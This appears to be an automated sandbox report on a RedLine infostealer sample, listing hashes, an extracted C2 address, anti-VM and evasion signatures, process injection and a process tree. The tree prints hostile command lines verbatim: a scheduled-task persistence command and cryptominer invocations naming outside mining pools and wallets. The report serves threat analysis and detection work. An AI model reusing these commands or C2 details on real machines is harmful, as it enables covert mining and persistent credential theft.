redline | 5b8ecae5fd44af6428f88915af963e596ad4af121076bcab7956c5125e56306b

General

Target

5daff0720e5dd482ea874b77624bd441.exe
Size

2.5MB
MD5

5daff0720e5dd482ea874b77624bd441
SHA1

66bf798605bb4c12f69538ebd0c99c9198f24e4c
SHA256

5b8ecae5fd44af6428f88915af963e596ad4af121076bcab7956c5125e56306b
SHA512

f4f83fe09ca2f24bc5991a9b0784bfc61ffacb10736838f641bc4e90ff3eed813d6ca7f8351fbf555afa95443409bbfbd7d09da93c80faf2cb2738f9d522009d

Score

10^/10

redline @tag3r1 evasion infostealer miner spyware themida trojan

Malware Config

Extracted

Family

redline

Botnet

@tag3r1

C2

193.233.193.15:27469

Attributes

auth_value
554b82f47bce5a3808dbca3d25d639e4

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/196968-133-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

Detected Stratum cryptominer command 1 IoCs
Looks to be attempting to contact Stratum mining pool.
miner

Processes:

vbc.exe

pid process

1428 vbc.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

dllhost.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dllhost.exe
Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

dllhost.exessfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exeAZWZGASDYNOOA.exe

pid process

4916 dllhost.exe
4972 ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
4060 AZWZGASDYNOOA.exe

pid	process
1428	vbc.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	dllhost.exe

pid	process
4916	dllhost.exe
4972	ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
4060	AZWZGASDYNOOA.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

dllhost.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	dllhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	dllhost.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AZWZGASDYNOOA.exedllhost.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Control Panel\International\Geo\Nation	AZWZGASDYNOOA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Control Panel\International\Geo\Nation	dllhost.exe

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\dllhost.exe	themida
C:\Users\Admin\AppData\Local\Temp\dllhost.exe	themida
behavioral2/memory/4916-155-0x0000000000780000-0x0000000000DA6000-memory.dmp	themida
behavioral2/memory/4916-160-0x0000000000780000-0x0000000000DA6000-memory.dmp	themida

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

dllhost.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA dllhost.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

dllhost.exe

pid process

4916 dllhost.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	dllhost.exe

pid	process
4916	dllhost.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

5daff0720e5dd482ea874b77624bd441.exeAZWZGASDYNOOA.exe

description	pid	process	target process
PID 3704 set thread context of 196968	3704	5daff0720e5dd482ea874b77624bd441.exe	AppLaunch.exe
PID 4060 set thread context of 1428	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 set thread context of 792	4060	AZWZGASDYNOOA.exe	vbc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2872 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2368 timeout.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

AppLaunch.exedllhost.exeAZWZGASDYNOOA.exe

pid process

196968 AppLaunch.exe
4916 dllhost.exe
4916 dllhost.exe
4060 AZWZGASDYNOOA.exe
4060 AZWZGASDYNOOA.exe

pid	process
2872	schtasks.exe

pid	process
2368	timeout.exe

pid	process
196968	AppLaunch.exe
4916	dllhost.exe
4916	dllhost.exe
4060	AZWZGASDYNOOA.exe
4060	AZWZGASDYNOOA.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

AppLaunch.exedllhost.exessfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exeAZWZGASDYNOOA.exe

description	pid	process
Token: SeDebugPrivilege	196968	AppLaunch.exe
Token: SeDebugPrivilege	4916	dllhost.exe
Token: SeDebugPrivilege	4972	ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
Token: SeDebugPrivilege	4060	AZWZGASDYNOOA.exe

Suspicious use of WriteProcessMemory 49 IoCs

Processes:

5daff0720e5dd482ea874b77624bd441.exeAppLaunch.exedllhost.exessfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.execmd.exeAZWZGASDYNOOA.execmd.exevbc.exe

description	pid	process	target process
PID 3704 wrote to memory of 196968	3704	5daff0720e5dd482ea874b77624bd441.exe	AppLaunch.exe
PID 3704 wrote to memory of 196968	3704	5daff0720e5dd482ea874b77624bd441.exe	AppLaunch.exe
PID 3704 wrote to memory of 196968	3704	5daff0720e5dd482ea874b77624bd441.exe	AppLaunch.exe
PID 3704 wrote to memory of 196968	3704	5daff0720e5dd482ea874b77624bd441.exe	AppLaunch.exe
PID 3704 wrote to memory of 196968	3704	5daff0720e5dd482ea874b77624bd441.exe	AppLaunch.exe
PID 196968 wrote to memory of 4916	196968	AppLaunch.exe	dllhost.exe
PID 196968 wrote to memory of 4916	196968	AppLaunch.exe	dllhost.exe
PID 196968 wrote to memory of 4916	196968	AppLaunch.exe	dllhost.exe
PID 4916 wrote to memory of 4972	4916	dllhost.exe	ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
PID 4916 wrote to memory of 4972	4916	dllhost.exe	ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
PID 4972 wrote to memory of 3544	4972	ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe	cmd.exe
PID 4972 wrote to memory of 3544	4972	ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe	cmd.exe
PID 3544 wrote to memory of 2368	3544	cmd.exe	timeout.exe
PID 3544 wrote to memory of 2368	3544	cmd.exe	timeout.exe
PID 3544 wrote to memory of 4060	3544	cmd.exe	AZWZGASDYNOOA.exe
PID 3544 wrote to memory of 4060	3544	cmd.exe	AZWZGASDYNOOA.exe
PID 4060 wrote to memory of 1016	4060	AZWZGASDYNOOA.exe	cmd.exe
PID 4060 wrote to memory of 1016	4060	AZWZGASDYNOOA.exe	cmd.exe
PID 1016 wrote to memory of 2872	1016	cmd.exe	schtasks.exe
PID 1016 wrote to memory of 2872	1016	cmd.exe	schtasks.exe
PID 4060 wrote to memory of 1428	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 1428	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 1428	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 1428	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 1428	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 1428	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 1428	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 1428	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 1428	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 1428	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 1428	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 1428	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 1428	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 1428	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 1428 wrote to memory of 4280	1428	vbc.exe	cmd.exe
PID 1428 wrote to memory of 4280	1428	vbc.exe	cmd.exe
PID 4060 wrote to memory of 792	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 792	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 792	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 792	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 792	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 792	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 792	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 792	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 792	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 792	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 792	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 792	4060	AZWZGASDYNOOA.exe	vbc.exe
PID 4060 wrote to memory of 792	4060	AZWZGASDYNOOA.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\5daff0720e5dd482ea874b77624bd441.exe
"C:\Users\Admin\AppData\Local\Temp\5daff0720e5dd482ea874b77624bd441.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3704

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:196968

C:\Users\Admin\AppData\Local\Temp\dllhost.exe
"C:\Users\Admin\AppData\Local\Temp\dllhost.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4916

C:\Users\Admin\AppData\Roaming\ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
"C:\Users\Admin\AppData\Roaming\ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEA21.tmp.bat""
5⤵
- Suspicious use of WriteProcessMemory
PID:3544

C:\Windows\system32\timeout.exe
timeout 3
6⤵
- Delays execution with timeout.exe
PID:2368

C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe
"C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4060

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AZWZGASDYNOOA" /tr "C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe"
7⤵
- Suspicious use of WriteProcessMemory
PID:1016

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AZWZGASDYNOOA" /tr "C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe"
8⤵
- Creates scheduled task(s)
PID:2872

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RFiihDJ8WoynFyMePc1sP28nmxoLmatE9n.work -p x -t 4
7⤵
- Detected Stratum cryptominer command
- Suspicious use of WriteProcessMemory
PID:1428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
8⤵
PID:4280

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe --pool stratum://0xd522E4e1279f59e64625757D66ba4Cbb20D6dC0C.WORKER@eu1.ethermine.org:4444 --cinit-max-gpu=80
7⤵
PID:792

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

1

T1064

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Virtualization/Sandbox Evasion

1

T1497

Scripting

1

T1064

Credential Access

Credentials in Files

1

T1081

Discovery

Query Registry

3

T1012

Virtualization/Sandbox Evasion

1

T1497

System Information Discovery

4

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe
Filesize
845KB

MD5
93b40ed9ef66ae2c72c9b29cfde49a9a

SHA1
90f356d379e9003ec9fba486f87b06e12ace89bc

SHA256
7cf14371db51b67557ca62b3cb9fc79e18647aea00d4540f9caf1c44316f3813

SHA512
d20b7d1e8da6299add1c51c245c886be273ed429941bf6272bb7b178bff2611d967557e9bfbe420a5c7bcd281c9d8830d53625fc8757bb2710581ba77b47ab00

Download Submit
C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe
Filesize
845KB

MD5
93b40ed9ef66ae2c72c9b29cfde49a9a

SHA1
90f356d379e9003ec9fba486f87b06e12ace89bc

SHA256
7cf14371db51b67557ca62b3cb9fc79e18647aea00d4540f9caf1c44316f3813

SHA512
d20b7d1e8da6299add1c51c245c886be273ed429941bf6272bb7b178bff2611d967557e9bfbe420a5c7bcd281c9d8830d53625fc8757bb2710581ba77b47ab00

Download Submit
C:\Users\Admin\AppData\Local\Temp\dllhost.exe
Filesize
3.4MB

MD5
b67da452eabdb5202468322d11b07c01

SHA1
698f6779381714ec3c7d19840da6a679da918e84

SHA256
4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324

SHA512
2d4547769f16537ca5e9a9c1beba7ee7047594b1789a25223855a9f86fe1eafdf005d69c57b63f5ff65bbad12052226782e5d558323590057d4eac2f90091205

Download Submit
C:\Users\Admin\AppData\Local\Temp\dllhost.exe
Filesize
3.4MB

MD5
b67da452eabdb5202468322d11b07c01

SHA1
698f6779381714ec3c7d19840da6a679da918e84

SHA256
4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324

SHA512
2d4547769f16537ca5e9a9c1beba7ee7047594b1789a25223855a9f86fe1eafdf005d69c57b63f5ff65bbad12052226782e5d558323590057d4eac2f90091205

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpEA21.tmp.bat
Filesize
153B

MD5
a11a26de9ba791d7737dce9d61f6d6dc

SHA1
3cff76faa15b47c2e60ab3da312d8f51d4f82d5a

SHA256
1d90af78b5b7d1d566c5110823c737d8e0db4d027bcd68086a9ffbe551cb75ba

SHA512
64e3ea900c1e191d9fb75dad8a10681ef02e4c9ad948eb90f64d6c48602e1d2c37ab29fd98c0382a72c2d887563d68a530d8cd03ec7190c0a8e8773eed8725f3

Download Submit
C:\Users\Admin\AppData\Roaming\ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
Filesize
845KB

MD5
93b40ed9ef66ae2c72c9b29cfde49a9a

SHA1
90f356d379e9003ec9fba486f87b06e12ace89bc

SHA256
7cf14371db51b67557ca62b3cb9fc79e18647aea00d4540f9caf1c44316f3813

SHA512
d20b7d1e8da6299add1c51c245c886be273ed429941bf6272bb7b178bff2611d967557e9bfbe420a5c7bcd281c9d8830d53625fc8757bb2710581ba77b47ab00

Download Submit
C:\Users\Admin\AppData\Roaming\ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
Filesize
845KB

MD5
93b40ed9ef66ae2c72c9b29cfde49a9a

SHA1
90f356d379e9003ec9fba486f87b06e12ace89bc

SHA256
7cf14371db51b67557ca62b3cb9fc79e18647aea00d4540f9caf1c44316f3813

SHA512
d20b7d1e8da6299add1c51c245c886be273ed429941bf6272bb7b178bff2611d967557e9bfbe420a5c7bcd281c9d8830d53625fc8757bb2710581ba77b47ab00

Download Submit
memory/792-184-0x0000000140000000-0x0000000140444000-memory.dmp

Filesize
4.3MB

Download
memory/792-182-0x0000000140000000-0x0000000140444000-memory.dmp

Filesize
4.3MB

Download
memory/792-183-0x000000014025502C-mapping.dmp

Download
memory/1016-170-0x0000000000000000-mapping.dmp

Download
memory/1428-173-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1428-174-0x000000014006EE80-mapping.dmp

Download
memory/1428-175-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1428-176-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1428-181-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1428-179-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2368-165-0x0000000000000000-mapping.dmp

Download
memory/2872-171-0x0000000000000000-mapping.dmp

Download
memory/3544-163-0x0000000000000000-mapping.dmp

Download
memory/4060-167-0x0000000000000000-mapping.dmp

Download
memory/4060-180-0x00007FFD5C8D0000-0x00007FFD5D391000-memory.dmp

Filesize
10.8MB

Download
memory/4060-172-0x00007FFD5C8D0000-0x00007FFD5D391000-memory.dmp

Filesize
10.8MB

Download
memory/4060-185-0x00007FFD5C8D0000-0x00007FFD5D391000-memory.dmp

Filesize
10.8MB

Download
memory/4280-177-0x0000000000000000-mapping.dmp

Download
memory/4916-161-0x0000000077B40000-0x0000000077CE3000-memory.dmp

Filesize
1.6MB

Download
memory/4916-156-0x0000000077B40000-0x0000000077CE3000-memory.dmp

Filesize
1.6MB

Download
memory/4916-150-0x0000000000000000-mapping.dmp

Download
memory/4916-160-0x0000000000780000-0x0000000000DA6000-memory.dmp

Filesize
6.1MB

Download
memory/4916-153-0x0000000000780000-0x0000000000DA6000-memory.dmp

Filesize
6.1MB

Download
memory/4916-155-0x0000000000780000-0x0000000000DA6000-memory.dmp

Filesize
6.1MB

Download
memory/4972-178-0x00007FFD5C8D0000-0x00007FFD5D391000-memory.dmp

Filesize
10.8MB

Download
memory/4972-157-0x0000000000000000-mapping.dmp

Download
memory/4972-166-0x00007FFD5C8D0000-0x00007FFD5D391000-memory.dmp

Filesize
10.8MB

Download
memory/4972-162-0x0000000000FE0000-0x00000000010B8000-memory.dmp

Filesize
864KB

Download
memory/196968-144-0x0000000005E70000-0x0000000005F02000-memory.dmp

Filesize
584KB

Download
memory/196968-143-0x0000000006380000-0x0000000006924000-memory.dmp

Filesize
5.6MB

Download
memory/196968-147-0x0000000006A80000-0x0000000006AD0000-memory.dmp

Filesize
320KB

Download
memory/196968-146-0x0000000006010000-0x000000000602E000-memory.dmp

Filesize
120KB

Download
memory/196968-145-0x0000000005F10000-0x0000000005F86000-memory.dmp

Filesize
472KB

Download
memory/196968-149-0x0000000007C10000-0x000000000813C000-memory.dmp

Filesize
5.2MB

Download
memory/196968-132-0x0000000000000000-mapping.dmp

Download
memory/196968-148-0x0000000006CA0000-0x0000000006E62000-memory.dmp

Filesize
1.8MB

Download
memory/196968-142-0x0000000005290000-0x00000000052F6000-memory.dmp

Filesize
408KB

Download
memory/196968-141-0x0000000004F50000-0x0000000004F8C000-memory.dmp

Filesize
240KB

Download
memory/196968-140-0x0000000005020000-0x000000000512A000-memory.dmp

Filesize
1.0MB

Download
memory/196968-139-0x0000000004EF0000-0x0000000004F02000-memory.dmp

Filesize
72KB

Download
memory/196968-138-0x00000000054B0000-0x0000000005AC8000-memory.dmp

Filesize
6.1MB

Download
memory/196968-133-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads